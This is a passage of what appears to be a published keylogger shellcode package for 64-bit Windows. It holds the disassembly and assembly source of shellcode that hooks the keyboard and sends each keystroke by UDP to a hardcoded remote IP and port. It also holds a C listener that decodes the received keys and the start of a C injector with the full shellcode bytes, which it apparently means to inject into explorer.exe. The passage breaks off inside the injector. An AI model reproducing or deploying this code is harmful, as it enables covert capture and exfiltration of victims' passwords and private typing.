[rsp+rsi*1]\r\n 2c5: 48 ff c6 inc rsi\r\n 2c8: 49 39 c2 cmp r10,rax\r\n 2cb: 75 f4 jne 2c1 <find>\r\n 2cd: 48 83 c6 07 add rsi,0x7\r\n 2d1: 48 8d 1c 34 lea rbx,[rsp+rsi*1]\r\n 2d5: 48 8b 3b mov rdi,QWORD PTR [rbx]\r\n 2d8: 4c 8b 63 08 mov r12,QWORD PTR [rbx+0x8]\r\n 2dc: 4c 8b 7b 10 mov r15,QWORD PTR [rbx+0x10]\r\n 2e0: 48 85 c9 test rcx,rcx\r\n 2e3: 75 68 jne 34d <_out_>\r\n 2e5: 48 31 db xor rbx,rbx\r\n 2e8: b3 01 mov bl,0x1\r\n 2ea: 48 c1 e3 08 shl rbx,0x8\r\n 2ee: 48 39 da cmp rdx,rbx\r\n 2f1: 75 5a jne 34d <_out_>\r\n 2f3: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20]\r\n 2f7: 48 31 c9 xor rcx,rcx\r\n 2fa: b1 14 mov cl,0x14\r\n 2fc: ff d3 call rbx\r\n 2fe: 66 41 89 04 24 mov WORD PTR [r12],ax\r\n 303: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20]\r\n 307: 48 31 c9 xor rcx,rcx\r\n 30a: b1 10 mov cl,0x10\r\n 30c: ff d3 call rbx\r\n 30e: 66 41 89 44 24 02 mov WORD PTR [r12+0x2],ax\r\n 314: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10]\r\n 319: 8b 03 mov eax,DWORD PTR [rbx]\r\n 31b: 41 89 44 24 04 mov DWORD PTR [r12+0x4],eax\r\n 320: 48 83 ec 58 sub rsp,0x58\r\n 324: 48 8b 4f 08 mov rcx,QWORD PTR [rdi+0x8]\r\n 328: 41 54 push r12\r\n 32a: 5a pop rdx\r\n 32b: 4d 31 c9 xor r9,r9\r\n 32e: 41 51 push r9\r\n 330: 41 58 pop r8\r\n 332: 41 b0 10 mov r8b,0x10\r\n 335: 4c 89 7c 24 20 mov QWORD PTR [rsp+0x20],r15\r\n 33a: 4c 89 44 24 28 mov QWORD PTR [rsp+0x28],r8\r\n 33f: 49 83 e8 08 sub r8,0x8\r\n 343: 48 8b 5f 50 mov rbx,QWORD PTR [rdi+0x50]\r\n 347: ff d3 call rbx\r\n 349: 48 83 c4 58 add rsp,0x58\r\n \r\n000000000000034d <_out_>:\r\n 34d: 5a pop rdx\r\n 34e: 41 58 pop r8\r\n 350: 41 59 pop r9\r\n 352: 48 8b 5f 18 mov rbx,QWORD PTR [rdi+0x18]\r\n 356: 48 31 c9 xor rcx,rcx\r\n 359: ff d3 call rbx\r\n 35b: 48 83 c4 58 add rsp,0x58\r\n 35f: c3 ret \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n*/\r\n \r\n \r\n \r\n \r\n/*\r\nsection .text\r\n global _start\r\n_start:\r\n \r\njmp short p1\r\n \r\n_init_:\r\n \r\nxor rdx,rdx\r\nmov rax,[gs:rdx+0x60] ; getting pointer of PEB structure\r\nmov rax,[rax+24] ;rax=PPEB->Ldr\r\nmov rax,[rax+32] ;Ldr->InMemoryOrderModuleList\r\nmov rsi,[rax]\r\nmov rax,[rsi]\r\nmov rsi,[rax+32] ;kernel32.dll base address\r\n \r\npop rbx ;address of _p2_\r\n \r\npush rbx\r\nret; transferring execution control to _p2_\r\n \r\n \r\n \r\np1:\r\ncall _init_\r\n \r\n \r\n \r\n;-----------------------------------------------------------------------------------------------------\r\n \r\n_p2_:\r\n \r\n \r\npush rdx\r\npush rdx\r\nlea r15,[rsp]\r\nsub rsp,56\r\nlea r12,[rsp] ; pointer important data (2 short int + 1 DWORD + 48 byte MSG structure )\r\nsub rsp,88\r\nlea rdi,[rsp] ; pointer to function address\r\n \r\n \r\n \r\npush r15\r\npush r12\r\npush rdi\r\nmov rax,'HEREITIS'\r\npush rax\r\n \r\nxor rax,rax\r\nmov ax,get_addr-_p2_\r\nadd rbx,rax ; address of get_addr\r\n \r\npush rbx ;reserving future use\r\n \r\nmov rcx,rsi\r\n \r\n \r\nlea rdx,[rbx-(get_addr-kernel32_func)]\r\n \r\n \r\nxor r8,r8\r\nmov r8b,2\r\nmov r9,rdi\r\ncall rbx ;loading kernel32_func functions\r\n \r\n \r\n;-------------------------------------------------------------------------------------\r\n \r\npop r13 ;address of get_addr\r\n \r\n;loading ws2_32.dll \r\n \r\nxor rax,rax\r\npush rax\r\npush rax\r\n \r\nmov rax,'ws2_32.d'\r\nmov [rsp],rax\r\nmov [rsp+8],word 'll'\r\nlea rcx,[rsp]\r\nmov rsi,[rdi+8]\r\nsub rsp,40\r\n \r\ncall rsi\r\nxchg rsi,rax\r\n \r\n;----------------------------------------------------------\r\n;loading user32.dll\r\nlea rcx,[rsp+40]\r\nmov [rcx],dword 'user'\r\n \r\ncall rax\r\n \r\n \r\n;====================================\r\n;loading user32.dll functions\r\nmov rcx,rax\r\nlea rdx,[r13-(get_addr-user32_func)]\r\nxor r8,r8\r\nmov r8b,6\r\nlea r9,[rdi+16] ;user32.dll functions from 16\r\ncall r13\r\n \r\n;===================================\r\n;loading ws2_32.dll functions\r\n \r\nmov rcx,rsi\r\nlea rdx,[r13-(get_addr-ws2_32_func)]\r\nxor r8,r8\r\nmov r8b,3\r\nlea r9,[rdi+64] ;ws2_32.dll functions from 64\r\ncall r13\r\n \r\nadd rsp,56\r\n;===========================================All necessary functions are loaded. Time to proceed to main task ========================================\r\n \r\n_p3_:\r\n \r\nxor rcx,rcx\r\nmov cx,408\r\nsub rsp,rcx\r\nadd rcx,106\r\nlea rdx,[rsp]\r\nmov rbx,[rdi+64] ;WSAStartup()\r\n \r\ncall rbx\r\n \r\n \r\nxor rcx,rcx\r\n \r\n \r\n \r\n \r\nmov cl,2\r\npush rcx\r\npush rcx\r\npop rdx\r\npop r8\r\nmov r8b,17\r\nmov rbx,[rdi+72] ;socket()\r\ncall rbx\r\n \r\nmov [rdi+8],rax ;SOCKET\r\n \r\n \r\n \r\n \r\n \r\nmov rbx,[rdi] ; GetModuleHandleA()\r\nxor rcx,rcx\r\ncall rbx\r\n \r\n;------------------------------------\r\n \r\nmov [r15],byte 2\r\nmov [r15+2],word 0x83db ;port change it\r\nmov [r15+4],dword 0x63c1a1c1 ;IP change it\r\n \r\n;-----------------------------------\r\n \r\n \r\n \r\n \r\nxor r9,r9\r\npush r9\r\npush r9\r\npop rcx\r\npop rdx\r\nmov cl,13\r\nmov r8,rax\r\nmov dl,_proceed_-get_addr\r\nadd rdx,r13 \r\nmov rbx,[rdi+16] ;SetWindowsHookExA()\r\n \r\ncall rbx\r\n \r\n \r\n \r\n_p4_:\r\n \r\nlea rcx,[r12+8]\r\nxor rdx,rdx\r\npush rdx\r\npush rdx\r\npop r8\r\npop r9\r\nmov rbx,[rdi+40] ;GetMessageA()\r\n \r\n \r\n \r\ncall rbx\r\n \r\n \r\n \r\n \r\nlea rcx,[r12+8]\r\nmov rbx,[rdi+48] ;TranslateMessage() \r\n \r\ncall rbx\r\n \r\nlea rcx,[r12+8]\r\nmov rbx,[rdi+56] ;DispatchMessageA()\r\n \r\ncall rbx\r\n \r\n \r\njmp short _p4_\r\n \r\n \r\n \r\n;----------------------------------------------------------------------------------------\r\nkernel32_func:\r\ndb 'GetModuleHandleA',1,'LoadLibraryA',1\r\n \r\n \r\nuser32_func:\r\ndb 'SetWindowsHookExA',1,'CallNextHookEx',1,'GetKeyState',1,'GetMessageA',1,'TranslateMessage',1,'DispatchMessageA',1\r\n \r\nws2_32_func:\r\ndb 'WSAStartup',1,'socket',1,'sendto',1\r\n \r\n \r\nget_addr: ; rcx=dll base , rdx=function name string address , r8=number of functions , r9=address of buffer \r\ndb 0x56,0x57,0x41,0x50,0x52,0x41,0x51,0x51,0x41,0x5b,0x48,0x31,0xdb,0x53,0x53,0x5a,0x58,0x8b,0x59,0x3c,0x48,0x01,0xcb,0xb2,0x88,0x8b,0x04,0x13,0x48,0x01,0xc8,0x48,0x31,0xd2,0x52,0x52,0x52,0x41,0x58,0x41,0x59,0x41,0x5a,0x44,0x8b,0x40,0x20,0x4d,0x01,0xd8,0x44,0x8b,0x48,0x24,0x4d,0x01,0xd9,0x44,0x8b,0x50,0x1c,0x4d,0x01,0xda,0x48,0x31,0xd2,0x48,0x31,0xf6,0x56,0x59,0x41,0x8b,0x34,0x90,0x4c,0x01,0xde,0x48,0x8b,0x7c,0x24,0x08,0x48,0x31,0xc0,0x8a,0x04,0x0f,0x48,0xff,0xc1,0x3c,0x01,0x75,0xf6,0x48,0xff,0xc2,0x51,0x48,0xff,0xc9,0x48,0x87,0xf7,0xf3,0xa6,0x59,0x75,0xd3,0x48,0xff,0xca,0x48,0x8b,0x7c,0x24,0x08,0x48,0x01,0xcf,0x48,0x89,0x7c,0x24,0x08,0x48,0x31,0xdb,0x53,0x58,0x66,0x41,0x8b,0x1c,0x51,0x41,0x8b,0x04,0x9a,0x4c,0x01,0xd8,0x48,0x8b,0x1c,0x24,0x48,0x89,0x03,0x48,0x83,0xc3,0x08,0x48,0x89,0x1c,0x24,0x48,0x8b,0x5c,0x24,0x10,0x48,0xff,0xcb,0x48,0x89,0x5c,0x24,0x10,0x48,0x31,0xd2,0x48,0x39,0xd3,0x75,0x8e,0x48,0x83,0xc4,0x18,0x5f,0x5e,0xc3\r\n \r\n;-------------------------------------------------------------------------------------------------------------------\r\n_proceed_:\r\n \r\nsub rsp,88\r\npush r8\r\npush rdx\r\npush rcx\r\n \r\n \r\n \r\n \r\n;---------------------------------------------\r\nxor rsi,rsi\r\nmov rax,'HEREITIS'\r\nfind:\r\n \r\n \r\nmov r10,[rsp+rsi]\r\ninc rsi\r\ncmp r10,rax\r\njne find\r\n \r\nadd rsi,7\r\nlea rbx,[rsp+rsi]\r\nmov rdi,[rbx]\r\nmov r12,[rbx+8]\r\nmov r15,[rbx+16]\r\n \r\n \r\n;------------------------------------------------\r\ntest rcx,rcx\r\njnz short _out_\r\n \r\nxor rbx,rbx\r\nmov bl,1\r\nshl rbx,8\r\n \r\ncmp rdx,rbx\r\njne short _out_\r\n \r\n \r\n;--------------------------------------------------------\r\n \r\nmov rbx,[rdi+32] ;GetKeyState(VK_CAPITAL)\r\nxor rcx,rcx\r\nmov cl,0x14\r\ncall rbx\r\n \r\nmov [r12],ax\r\n \r\nmov rbx,[rdi+32] ;GetKeyState(VK_SHIFT)\r\nxor rcx,rcx\r\nmov cl,0x10\r\ncall rbx\r\n \r\nmov [r12+2],ax\r\n \r\n \r\n \r\n \r\n;-------------------------------\r\n;sending keystrokes\r\nmov rbx,[rsp+16]\r\nmov eax,[rbx]\r\nmov [r12+4],eax ;Virtual key code\r\n \r\nsub rsp,88\r\nmov rcx,[rdi+8] ;SOCKET\r\npush r12\r\npop rdx\r\n \r\nxor r9,r9\r\npush r9\r\n \r\npop r8\r\nmov r8b,16\r\nmov [rsp+32],r15\r\nmov [rsp+40],r8\r\nsub r8,8\r\n \r\nmov rbx,[rdi+80]\r\ncall rbx\r\nadd rsp,88\r\n \r\n \r\n;-----------------------------------------------------------\r\n \r\n_out_:\r\n \r\npop rdx\r\npop r8\r\npop r9\r\n \r\n \r\nmov rbx,[rdi+24]\r\n \r\nxor rcx,rcx\r\n \r\ncall rbx\r\n \r\n \r\nadd rsp,88\r\n \r\n \r\nret\r\n \r\n \r\n \r\n \r\n \r\n \r\n*/\r\n \r\n \r\n/*\r\n \r\n//keylogger Handler\r\n \r\n#include<stdio.h>\r\n#include<winsock2.h>\r\n#include<windows.h>\r\n \r\n#pragma pack(1)\r\n \r\ntypedef struct key\r\n{\r\n short caps;\r\n short shift;\r\n DWORD vkcode;\r\n}KEYDATA;\r\n \r\n \r\nchar * Determine(BOOL caps,BOOL shift,DWORD code)\r\n{\r\n char * key;\r\n switch (code) // SWITCH ON INT\r\n {\r\n case 0x41: key = caps ? (shift ? \"a\" : \"A\") : (shift ? \"A\" : \"a\"); break;\r\n case 0x42: key = caps ? (shift ? \"b\" : \"B\") : (shift ? \"B\" : \"b\"); break;\r\n case 0x43: key = caps ? (shift ? \"c\" : \"C\") : (shift ? \"C\" : \"c\"); break;\r\n case 0x44: key = caps ? (shift ? \"d\" : \"D\") : (shift ? \"D\" : \"d\"); break;\r\n case 0x45: key = caps ? (shift ? \"e\" : \"E\") : (shift ? \"E\" : \"e\"); break;\r\n case 0x46: key = caps ? (shift ? \"f\" : \"F\") : (shift ? \"F\" : \"f\"); break;\r\n case 0x47: key = caps ? (shift ? \"g\" : \"G\") : (shift ? \"G\" : \"g\"); break;\r\n case 0x48: key = caps ? (shift ? \"h\" : \"H\") : (shift ? \"H\" : \"h\"); break;\r\n case 0x49: key = caps ? (shift ? \"i\" : \"I\") : (shift ? \"I\" : \"i\"); break;\r\n case 0x4A: key = caps ? (shift ? \"j\" : \"J\") : (shift ? \"J\" : \"j\"); break;\r\n case 0x4B: key = caps ? (shift ? \"k\" : \"K\") : (shift ? \"K\" : \"k\"); break;\r\n case 0x4C: key = caps ? (shift ? \"l\" : \"L\") : (shift ? \"L\" : \"l\"); break;\r\n case 0x4D: key = caps ? (shift ? \"m\" : \"M\") : (shift ? \"M\" : \"m\"); break;\r\n case 0x4E: key = caps ? (shift ? \"n\" : \"N\") : (shift ? \"N\" : \"n\"); break;\r\n case 0x4F: key = caps ? (shift ? \"o\" : \"O\") : (shift ? \"O\" : \"o\"); break;\r\n case 0x50: key = caps ? (shift ? \"p\" : \"P\") : (shift ? \"P\" : \"p\"); break;\r\n case 0x51: key = caps ? (shift ? \"q\" : \"Q\") : (shift ? \"Q\" : \"q\"); break;\r\n case 0x52: key = caps ? (shift ? \"r\" : \"R\") : (shift ? \"R\" : \"r\"); break;\r\n case 0x53: key = caps ? (shift ? \"s\" : \"S\") : (shift ? \"S\" : \"s\"); break;\r\n case 0x54: key = caps ? (shift ? \"t\" : \"T\") : (shift ? \"T\" : \"t\"); break;\r\n case 0x55: key = caps ? (shift ? \"u\" : \"U\") : (shift ? \"U\" : \"u\"); break;\r\n case 0x56: key = caps ? (shift ? \"v\" : \"V\") : (shift ? \"V\" : \"v\"); break;\r\n case 0x57: key = caps ? (shift ? \"w\" : \"W\") : (shift ? \"W\" : \"w\"); break;\r\n case 0x58: key = caps ? (shift ? \"x\" : \"X\") : (shift ? \"X\" : \"x\"); break;\r\n case 0x59: key = caps ? (shift ? \"y\" : \"Y\") : (shift ? \"Y\" : \"y\"); break;\r\n case 0x5A: key = caps ? (shift ? \"z\" : \"Z\") : (shift ? \"Z\" : \"z\"); break;\r\n // Sleep Key\r\n case VK_SLEEP: key = \"[SLEEP]\"; break;\r\n // Num Keyboard \r\n case VK_NUMPAD0: key = \"0\"; break;\r\n case VK_NUMPAD1: key = \"1\"; break;\r\n case VK_NUMPAD2 : key = \"2\"; break;\r\n case VK_NUMPAD3: key = \"3\"; break;\r\n case VK_NUMPAD4: key = \"4\"; break;\r\n case VK_NUMPAD5: key = \"5\"; break;\r\n case VK_NUMPAD6: key = \"6\"; break;\r\n case VK_NUMPAD7: key = \"7\"; break;\r\n case VK_NUMPAD8: key = \"8\"; break;\r\n case VK_NUMPAD9: key = \"9\"; break;\r\n case VK_MULTIPLY: key = \"*\"; break;\r\n case VK_ADD: key = \"+\"; break;\r\n case VK_SEPARATOR: key = \"-\"; break;\r\n case VK_SUBTRACT: key = \"-\"; break;\r\n case VK_DECIMAL: key = \".\"; break;\r\n case VK_DIVIDE: key = \"/\"; break;\r\n // Function Keys\r\n case VK_F1: key = \"[F1]\"; break;\r\n case VK_F2: key = \"[F2]\"; break;\r\n case VK_F3: key = \"[F3]\"; break;\r\n case VK_F4: key = \"[F4]\"; break;\r\n case VK_F5: key = \"[F5]\"; break;\r\n case VK_F6: key = \"[F6]\"; break;\r\n case VK_F7: key = \"[F7]\"; break;\r\n case VK_F8: key = \"[F8]\"; break;\r\n case VK_F9: key = \"[F9]\"; break;\r\n case VK_F10: key = \"[F10]\"; break;\r\n case VK_F11: key = \"[F11]\"; break;\r\n case VK_F12: key = \"[F12]\"; break;\r\n case VK_F13: key = \"[F13]\"; break;\r\n case VK_F14: key = \"[F14]\"; break;\r\n case VK_F15: key = \"[F15]\"; break;\r\n case VK_F16: key = \"[F16]\"; break;\r\n case VK_F17: key = \"[F17]\"; break;\r\n case VK_F18: key = \"[F18]\"; break;\r\n case VK_F19: key = \"[F19]\"; break;\r\n case VK_F20: key = \"[F20]\"; break;\r\n case VK_F21: key = \"[F22]\"; break;\r\n case VK_F22: key = \"[F23]\"; break;\r\n case VK_F23: key = \"[F24]\"; break;\r\n case VK_F24: key = \"[F25]\"; break;\r\n // Keys\r\n case VK_NUMLOCK: key = \"[NUM-LOCK]\"; break;\r\n case VK_SCROLL: key = \"[SCROLL-LOCK]\"; break;\r\n case VK_BACK: key = \"[BACK]\"; break;\r\n case VK_TAB: key = \"[TAB]\"; break;\r\n case VK_CLEAR: key = \"[CLEAR]\"; break;\r\n case VK_RETURN: key = \"[ENTER]\"; break;\r\n case VK_SHIFT: key = \"[SHIFT]\"; break;\r\n case VK_CONTROL: key = \"[CTRL]\"; break;\r\n case VK_MENU: key = \"[ALT]\"; break;\r\n case VK_PAUSE: key = \"[PAUSE]\"; break;\r\n case VK_CAPITAL: key = \"[CAP-LOCK]\"; break;\r\n case VK_ESCAPE: key = \"[ESC]\"; break;\r\n case VK_SPACE: key = \"[SPACE]\"; break;\r\n case VK_PRIOR: key = \"[PAGEUP]\"; break;\r\n case VK_NEXT: key = \"[PAGEDOWN]\"; break;\r\n case VK_END: key = \"[END]\"; break;\r\n case VK_HOME: key = \"[HOME]\"; break;\r\n case VK_LEFT: key = \"[LEFT]\"; break;\r\n case VK_UP: key = \"[UP]\"; break;\r\n case VK_RIGHT: key = \"[RIGHT]\"; break;\r\n case VK_DOWN: key = \"[DOWN]\"; break;\r\n case VK_SELECT: key = \"[SELECT]\"; break;\r\n case VK_PRINT: key = \"[PRINT]\"; break;\r\n case VK_SNAPSHOT: key = \"[PRTSCRN]\"; break;\r\n case VK_INSERT: key = \"[INS]\"; break;\r\n case VK_DELETE: key = \"[DEL]\"; break;\r\n case VK_HELP: key = \"[HELP]\"; break;\r\n // Number Keys with shift\r\n case 0x30: key = shift ? \")\" : \"0\"; break; \r\n case 0x31: key = shift ? \"!\" : \"1\"; break;\r\n case 0x32: key = shift ? \"@\" : \"2\"; break;\r\n case 0x33: key = shift ? \"#\" : \"3\"; break;\r\n case 0x34: key = shift ? \"$\" : \"4\"; break;\r\n case 0x35: key = shift ? \"%\" : \"5\"; break;\r\n case 0x36: key = shift ? \"^\" : \"6\"; break;\r\n case 0x37: key = shift ? \"&\" : \"7\"; break;\r\n case 0x38: key = shift ? \"*\" : \"8\"; break;\r\n case 0x39: key = shift ? \"(\" : \"9\"; break;\r\n // Windows Keys\r\n case VK_LWIN: key = \"[WIN]\"; break;\r\n case VK_RWIN: key = \"[WIN]\"; break;\r\n case VK_LSHIFT: key = \"[SHIFT]\"; break;\r\n case VK_RSHIFT: key = \"[SHIFT]\"; break;\r\n case VK_LCONTROL: key = \"[CTRL]\"; break;\r\n case VK_RCONTROL: key = \"[CTRL]\"; break;\r\n // OEM Keys with shift \r\n case VK_OEM_1: key = shift ? \":\" : \";\"; break;\r\n case VK_OEM_PLUS: key = shift ? \"+\" : \"=\"; break;\r\n case VK_OEM_COMMA: key = shift ? \"<\" : \",\"; break; \r\n case VK_OEM_MINUS: key = shift ? \"_\" : \"-\"; break;\r\n case VK_OEM_PERIOD: key = shift ? \">\" : \".\"; break;\r\n case VK_OEM_2: key = shift ? \"?\" : \"/\"; break;\r\n case VK_OEM_3: key = shift ? \"~\" : \"`\"; break;\r\n case VK_OEM_4: key = shift ? \"{\" : \"[\"; break;\r\n case VK_OEM_5: key = shift ? \"|\" : \"\\\\\"; break;\r\n case VK_OEM_6: key = shift ? \"}\" : \"]\"; break;\r\n case VK_OEM_7: key = shift ? \"\\\"\" : \"'\"; break; //TODO: Escape this char: \"\r\n // Action Keys\r\n case VK_PLAY: key = \"[PLAY]\";break;\r\n case VK_ZOOM: key = \"[ZOOM]\";break;\r\n case VK_OEM_CLEAR: key = \"[CLEAR]\";break;\r\n case VK_CANCEL: key = \"[CTRL-C]\";break;\r\n \r\n default: key = \"[UNK-KEY]\";break;\r\n }\r\n return key;\r\n}\r\n \r\n \r\n \r\nint main()\r\n{\r\n int port;\r\n SOCKET s;\r\n struct sockaddr_in sr,cr;\r\n WSADATA wsa;\r\n KEYDATA keystrk;\r\n char * n;\r\n \r\n printf(\"Enter Port Number To Listen: \");\r\n scanf(\"%d\",&port);\r\n \r\n if(WSAStartup(514,&wsa))\r\n {\r\n printf(\"WSAStartup() Failed\");\r\n return 0;\r\n }\r\n \r\n if((s=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)\r\n {\r\n printf(\"Failed To Create Socket...\");\r\n return 0;\r\n }\r\n \r\n ZeroMemory(&sr,16);\r\n sr.sin_family=AF_INET;\r\n sr.sin_port=htons(port);\r\n \r\n if(bind(s,(struct sockaddr *)&sr,16))\r\n {\r\n printf(\"Failed To Bind..\");\r\n return 0;\r\n }\r\n \r\n port=16; //Why bother to declare a variable for int * fromlen\r\n while(1)\r\n {\r\n recvfrom(s,(char *)&keystrk,8,0,(struct sockaddr *)&cr,&port);\r\n n=Determine(keystrk.caps&0x0001,keystrk.shift>>15,keystrk.vkcode);\r\n printf(\"%s\",n);\r\n }\r\n return 0;\r\n}\r\n \r\n \r\n \r\n*/\r\n \r\n \r\n#include<windows.h>\r\n#include<stdio.h>\r\n#include<string.h>\r\n#include<tlhelp32.h>\r\n \r\nchar shellcode[]=\"\\xeb\\x1d\\x48\\x31\\xd2\\x65\\x48\\x8b\\x42\\x60\\x48\\x8b\\x40\\x18\\x48\\x8b\\x40\\x20\\x48\\x8b\\x30\\x48\\x8b\\x06\\x48\\x8b\\x70\\x20\\x5b\\x53\\xc3\\xe8\\xde\\xff\\xff\\xff\\x52\\x52\\x4c\\x8d\\x3c\\x24\\x48\\x83\\xec\\x38\\x4c\\x8d\\x24\\x24\\x48\\x83\\xec\\x58\\x48\\x8d\\x3c\\x24\\x41\\x57\\x41\\x54\\x57\\x48\\xb8\\x48\\x45\\x52\\x45\\x49\\x54\\x49\\x53\\x50\\x48\\x31\\xc0\\x66\\xb8\\xcc\\x01\\x48\\x01\\xc3\\x53\\x48\\x89\\xf1\\x48\\x8d\\x93\\x6e\\xff\\xff\\xff\\x4d\\x31\\xc0\\x41\\xb0\\x02\\x49\\x89\\xf9\\xff\\xd3\\x41\\x5d\\x48\\x31\\xc0\\x50\\x50\\x48\\xb8\\x77\\x73\\x32\\x5f\\x33\\x32\\x2e\\x64\\x48\\x89\\x04\\x24\\x66\\xc7\\x44\\x24\\x08\\x6c\\x6c\\x48\\x8d\\x0c\\x24\\x48\\x8b\\x77\\x08\\x48\\x83\\xec\\x28\\xff\\xd6\\x48\\x96\\x48\\x8d\\x4c\\x24\\x28\\xc7\\x01\\x75\\x73\\x65\\x72\\xff\\xd0\\x48\\x89\\xc1\\x49\\x8d\\x55\\x8c\\x4d\\x31\\xc0\\x41\\xb0\\x06\\x4c\\x8d\\x4f\\x10\\x41\\xff\\xd5\\x48\\x89\\xf1\\x49\\x8d\\x55\\xe7\\x4d\\x31\\xc0\\x41\\xb0\\x03\\x4c\\x8d\\x4f\\x40\\x41\\xff\\xd5\\x48\\x83\\xc4\\x38\\x48\\x31\\xc9\\x66\\xb9\\x98\\x01\\x48\\x29\\xcc\\x48\\x83\\xc1\\x6a\\x48\\x8d\\x14\\x24\\x48\\x8b\\x5f\\x40\\xff\\xd3\\x48\\x31\\xc9\\xb1\\x02\\x51\\x51\\x5a\\x41\\x58\\x41\\xb0\\x11\\x48\\x8b\\x5f\\x48\\xff\\xd3\\x48\\x89\\x47\\x08\\x48\\x8b\\x1f\\x48\\x31\\xc9\\xff\\xd3\\x41\\xc6\\x07\\x02\\x66\\x41\\xc7\\x47\\x02\\xdb\\x83\\x41\\xc7\\x47\\x04\\xc1\\xa1\\xc1\\x63\\x4d\\x31\\xc9\\x41\\x51\\x41\\x51\\x59\\x5a\\xb1\\x0d\\x49\\x89\\xc0\\xb2\\xbc\\x4c\\x01\\xea\\x48\\x8b\\x5f\\x10\\xff\\xd3\\x49\\x8d\\x4c\\x24\\x08\\x48\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x48\\x8b\\x5f\\x28\\xff\\xd3\\x49\\x8d\\x4c\\x24\\x08\\x48\\x8b\\x5f\\x30\\xff\\xd3\\x49\\x8d\\x4c\\x24\\x08\\x48\\x8b\\x5f\\x38\\xff\\xd3\\xeb\\xd4\\x47\\x65\\x74\\x4d\\x6f\\x64\\x75\\x6c\\x65\\x48\\x61\\x6e\\x64\\x6c\\x65\\x41\\x01\\x4c\\x6f\\x61\\x64\\x4c\\x69\\x62\\x72\\x61\\x72\\x79\\x41\\x01\\x53\\x65\\x74\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x48\\x6f\\x6f\\x6b\\x45\\x78\\x41\\x01\\x43\\x61\\x6c\\x6c\\x4e\\x65\\x78\\x74\\x48\\x6f\\x6f\\x6b\\x45\\x78\\x01\\x47\\x65\\x74\\x4b\\x65\\x79\\x53\\x74\\x61\\x74\\x65\\x01\\x47\\x65\\x74\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x41\\x01\\x54\\x72\\x61\\x6e\\x73\\x6c\\x61\\x74\\x65\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x01\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x41\\x01\\x57\\x53\\x41\\x53\\x74\\x61\\x72\\x74\\x75\\x70\\x01\\x73\\x6f\\x63\\x6b\\x65\\x74\\x01\\x73\\x65\\x6e\\x64\\x74\\x6f\\x01\\x56\\x57\\x41\\x50\\x52\\x41\\x51\\x51\\x41\\x5b\\x48\\x31\\xdb\\x53\\x53\\x5a\\x58\\x8b\\x59\\x3c\\x48\\x01\\xcb\\xb2\\x88\\x8b\\x04\\x13\\x48\\x01\\xc8\\x48\\x31\\xd2\\x52\\x52\\x52\\x41\\x58\\x41\\x59\\x41\\x5a\\x44\\x8b\\x40\\x20\\x4d\\x01\\xd8\\x44\\x8b\\x48\\x24\\x4d\\x01\\xd9\\x44\\x8b\\x50\\x1c\\x4d\\x01\\xda\\x48\\x31\\xd2\\x48\\x31\\xf6\\x56\\x59\\x41\\x8b\\x34\\x90\\x4c\\x01\\xde\\x48\\x8b\\x7c\\x24\\x08\\x48\\x31\\xc0\\x8a\\x04\\x0f\\x48\\xff\\xc1\\x3c\\x01\\x75\\xf6\\x48\\xff\\xc2\\x51\\x48\\xff\\xc9\\x48\\x87\\xf7\\xf3\\xa6\\x59\\x75\\xd3\\x48\\xff\\xca\\x48\\x8b\\x7c\\x24\\x08\\x48\\x01\\xcf\\x48\\x89\\x7c\\x24\\x08\\x48\\x31\\xdb\\x53\\x58\\x66\\x41\\x8b\\x1c\\x51\\x41\\x8b\\x04\\x9a\\x4c\\x01\\xd8\\x48\\x8b\\x1c\\x24\\x48\\x89\\x03\\x48\\x83\\xc3\\x08\\x48\\x89\\x1c\\x24\\x48\\x8b\\x5c\\x24\\x10\\x48\\xff\\xcb\\x48\\x89\\x5c\\x24\\x10\\x48\\x31\\xd2\\x48\\x39\\xd3\\x75\\x8e\\x48\\x83\\xc4\\x18\\x5f\\x5e\\xc3\\x48\\x83\\xec\\x58\\x41\\x50\\x52\\x51\\x48\\x31\\xf6\\x48\\xb8\\x48\\x45\\x52\\x45\\x49\\x54\\x49\\x53\\x4c\\x8b\\x14\\x34\\x48\\xff\\xc6\\x49\\x39\\xc2\\x75\\xf4\\x48\\x83\\xc6\\x07\\x48\\x8d\\x1c\\x34\\x48\\x8b\\x3b\\x4c\\x8b\\x63\\x08\\x4c\\x8b\\x7b\\x10\\x48\\x85\\xc9\\x75\\x68\\x48\\x31\\xdb\\xb3\\x01\\x48\\xc1\\xe3\\x08\\x48\\x39\\xda\\x75\\x5a\\x48\\x8b\\x5f\\x20\\x48\\x31\\xc9\\xb1\\x14\\xff\\xd3\\x66\\x41\\x89\\x04\\x24\\x48\\x8b\\x5f\\x20\\x48\\x31\\xc9\\xb1\\x10\\xff\\xd3\\x66\\x41\\x89\\x44\\x24\\x02\\x48\\x8b\\x5c\\x24\\x10\\x8b\\x03\\x41\\x89\\x44\\x24\\x04\\x48\\x83\\xec\\x58\\x48\\x8b\\x4f\\x08\\x41\\x54\\x5a\\x4d\\x31\\xc9\\x41\\x51\\x41\\x58\\x41\\xb0\\x10\\x4c\\x89\\x7c\\x24\\x20\\x4c\\x89\\x44\\x24\\x28\\x49\\x83\\xe8\\x08\\x48\\x8b\\x5f\\x50\\xff\\xd3\\x48\\x83\\xc4\\x58\\x5a\\x41\\x58\\x41\\x59\\x48\\x8b\\x5f\\x18\\x48\\x31\\xc9\\xff\\xd3\\x48\\x83\\xc4\\x58\\xc3\";\r\n \r\n \r\n \r\nint main()\r\n{\r\n HANDLE s,proc;\r\n PROCESSENTRY32 ps;\r\n BOOL process_found=0;\r\n LPVOID shell;\r\n SIZE_T total;\r\n \r\n //finding explorer.exe pid\r\n \r\n ps.dwSize=sizeof(ps);\r\n \r\n s=CreateToolhelp32Snapshot(2,0);\r\n \r\n if(s==INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"CreateToolhelp32Snapshot() failed.Error code %d\\n\",GetLastError());\r\n return -1;\r\n }\r\n \r\n if(!Process32First(s,&ps))\r\n {\r\n printf(\"Process32First() failed.Error code 